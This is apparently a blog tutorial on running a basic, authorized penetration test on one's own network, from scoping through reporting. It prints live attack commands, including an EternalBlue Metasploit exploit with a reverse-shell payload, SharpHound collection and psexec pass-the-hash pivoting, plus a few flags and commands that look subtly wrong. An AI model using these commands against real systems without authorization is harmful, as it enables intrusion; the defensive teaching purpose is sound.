Anasayfa / Cyber Security / How to Perform a Basic Penetration Test on Your Network – A Step‑by‑Step Guide

How to Perform a Basic Penetration Test on Your Network – A Step‑by‑Step Guide

network security

Penetration testing, or “pen‑testing,” is the practice of simulating real‑world attacks against your own infrastructure to discover weaknesses before malicious actors do. While large enterprises often hire external red teams, savvy IT professionals can run a solid, basic test on their own network with free tools and a disciplined methodology. This guide walks you through every phase—from scoping to reporting—using concrete commands, common pitfalls, and pro tips that keep you on the right side of the law and your budget.

What You’ll Need

  • A dedicated workstation running Kali Linux, Parrot OS, or a similar security‑focused distro.
  • Administrative access to the target network (written permission is mandatory).
  • Core tools: Nmap, Masscan, Nikto, OpenVAS, Metasploit, and BloodHound.
  • Basic scripting knowledge (Bash/Python) for automation.
  • A secure channel for reporting findings (encrypted PDF, password‑protected ZIP, or a ticketing system).

Step 1: Define Scope and Get Authorization

Before you type a single command, you must document exactly what you’re allowed to test. Draft a scope document that lists IP ranges, hostnames, and services in‑scope, as well as any out‑of‑scope assets (e.g., production databases). Obtain a signed “Rules of Engagement” (RoE) from management or the client. This legal safeguard protects you from accusations of unauthorized access and clarifies the depth of testing (e.g., no denial‑of‑service attacks). Keep the RoE handy; you’ll reference it when choosing tools and when writing the final report.

Step 2: Reconnaissance – Mapping the Network

The first technical phase is to discover what lives on the network. Start with a fast sweep using masscan to identify live hosts, then refine with nmap for service enumeration.

Example commands:

# Fast ping sweep (adjust rate to avoid IDS triggers)
masscan 10.0.0.0/24 -p0-65535 --rate=1000 -oG live_hosts.txt

# Detailed scan on discovered IPs
nmap -sS -sV -O -p- -iL live_hosts.txt -oA nmap_full

Key flags explained:

  • -sS: SYN stealth scan (less noisy than full connect).
  • -sV: Service version detection.
  • -O: OS fingerprinting.
  • -p-: Scan all 65,535 ports.

Save the output in all formats (-oA) for later reference. Common mistake: scanning the entire internet from a corporate IP—this triggers alerts and can violate ISP policies. Stick to the defined IP range.

Step 3: Vulnerability Scanning

With a list of services, you can now feed them into a vulnerability scanner. OpenVAS (now called Greenbone Vulnerability Manager) offers a robust, free solution.

Setup and run:

# Install OpenVAS (Debian/Ubuntu)
sudo apt-get update && sudo apt-get install -y openvas
sudo gvm-setup

# Start the scanner
gvmd &
openvas &

# Launch a scan against the target range
omp -u admin -w $(cat /etc/openvas/admin_password) -h 127.0.0.1 -p 9390 -T "Basic Network Scan" -t 10.0.0.0/24

After the scan finishes, review the HTML report for CVE identifiers and severity scores. Prioritize findings with a CVSS ≥ 7.0. A frequent error is treating every finding as critical; focus on exploitable, high‑impact vulnerabilities that match the services you actually use.

Step 4: Exploitation – Gaining Access

Now that you have a list of weak services, it’s time to attempt controlled exploitation. Metasploit Framework is the industry standard for this phase.

Example: exploiting an outdated SMB service on a Windows 10 workstation.

# Start Metasploit console
msfconsole

# Search for relevant exploit
search type:exploit name:smb version:1.0

# Use the EternalBlue exploit (if applicable)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.45
set LHOST 10.0.0.10   # Your Kali IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

If the exploit succeeds, you’ll receive a Meterpreter session. Immediately run post‑exploitation scripts to gather system information, but never alter production data.

Common mistake: running exploits against live services without a backup plan. Always test on a replica or schedule a maintenance window.

Step 5: Post‑Exploitation – Lateral Movement

Once you have foothold on one host, you can explore the internal network. BloodHound helps map Active Directory relationships, while psexec or winrm can be used for lateral moves.

# Export AD data with SharpHound (run on compromised host)
Invoke-BloodHound -CollectionMethod All -Domain yourdomain.local -ZipFileName bloodhound.zip

# Transfer zip back to your workstation
scp [email protected]:/tmp/bloodhound.zip .

# Load into BloodHound GUI for analysis
bloodhound

Identify privileged accounts, misconfigured trusts, or unconstrained delegation. From there, you can attempt to pivot using psexec:

# From your Kali box
psexec.py [email protected] -hashes : -no-pass

Remember: the goal is to demonstrate the path, not to cause damage. Document each step with timestamps and screenshots.

Step 6: Reporting and Remediation

A pen‑test is only as good as its report. Structure your findings as follows:

  • Executive Summary: High‑level risk rating for non‑technical stakeholders.
  • Scope & Methodology: What you tested, tools used, and timeframes.
  • Findings: For each vulnerability, include CVE, severity, proof‑of‑concept screenshots, and exact commands used.
  • Remediation Recommendations: Specific patches, configuration changes, or segmentation strategies.
  • Appendix: Full raw output files (Nmap, OpenVAS, Metasploit logs) in a password‑protected archive.

Use a template that matches your organization’s branding, and always encrypt the final PDF before distribution. Common mistake: omitting proof‑of‑concept evidence, which makes it hard for the remediation team to verify the issue.

Common Mistakes to Avoid

1. Skipping Authorization: Even internal tests need written consent; otherwise you risk legal trouble.

2. Over‑Scanning: Aggressive scans can trigger IDS/IPS alarms, cause outages, or be flagged as a denial‑of‑service attack.

3. Ignoring Scope Limits: Venturing outside the approved IP range can lead to unintended disruptions.

4. Failing to Document: Without logs and screenshots, findings become “hearsay” and lose credibility.

5. Leaving Exploits Running: Never leave a Meterpreter session open after you’ve captured the needed data; clean up to avoid backdoors.

Tips and Tricks

• Use a VPN or isolated VLAN for your testing workstation to keep traffic separate from production.

• Automate repetitive tasks with Bash loops or Python scripts; for example, loop Nmap across all live hosts and pipe results into a CSV.

• Leverage “quiet” scan options like --max-retries 1 and --defeat-ttl to reduce noise.

• Keep tools updated. Exploit modules expire quickly; a recent msfupdate can be the difference between success and failure.

• Validate findings on a test lab before presenting them; this reduces false positives and builds confidence.

Frequently Asked Questions

Do I need a paid scanner to find serious flaws?

No. Open-source tools like OpenVAS, Nmap NSE scripts, and Nikto can uncover most high‑severity issues. Paid scanners may offer faster reporting and better false‑positive handling, but they are not required for a solid basic test.

How long should a basic network pen‑test take?

For a small to medium LAN (≈200 hosts), expect 2‑3 days of active testing plus 1‑2 days for reporting. Larger environments scale linearly, so allocate time accordingly.

What legal safeguards should I have in place?

Beyond a signed RoE, keep a copy of your authorization email, maintain an immutable log of commands executed (e.g., script -a session.log), and notify your ISP if you plan to use high‑rate scanners like Masscan.

Conclusion

Performing a basic penetration test on your own network is entirely feasible with free tools, a disciplined methodology, and proper authorization. By following the six steps outlined above—scoping, reconnaissance, vulnerability scanning, exploitation, post‑exploitation, and reporting—you’ll uncover hidden weaknesses, demonstrate real‑world attack paths, and provide actionable remediation guidance. Remember, the ultimate goal isn’t to break things; it’s to fortify them before the bad guys get a chance. Happy hunting, and stay ethical!

Photo by FlyD on Unsplash

Etiketlendi: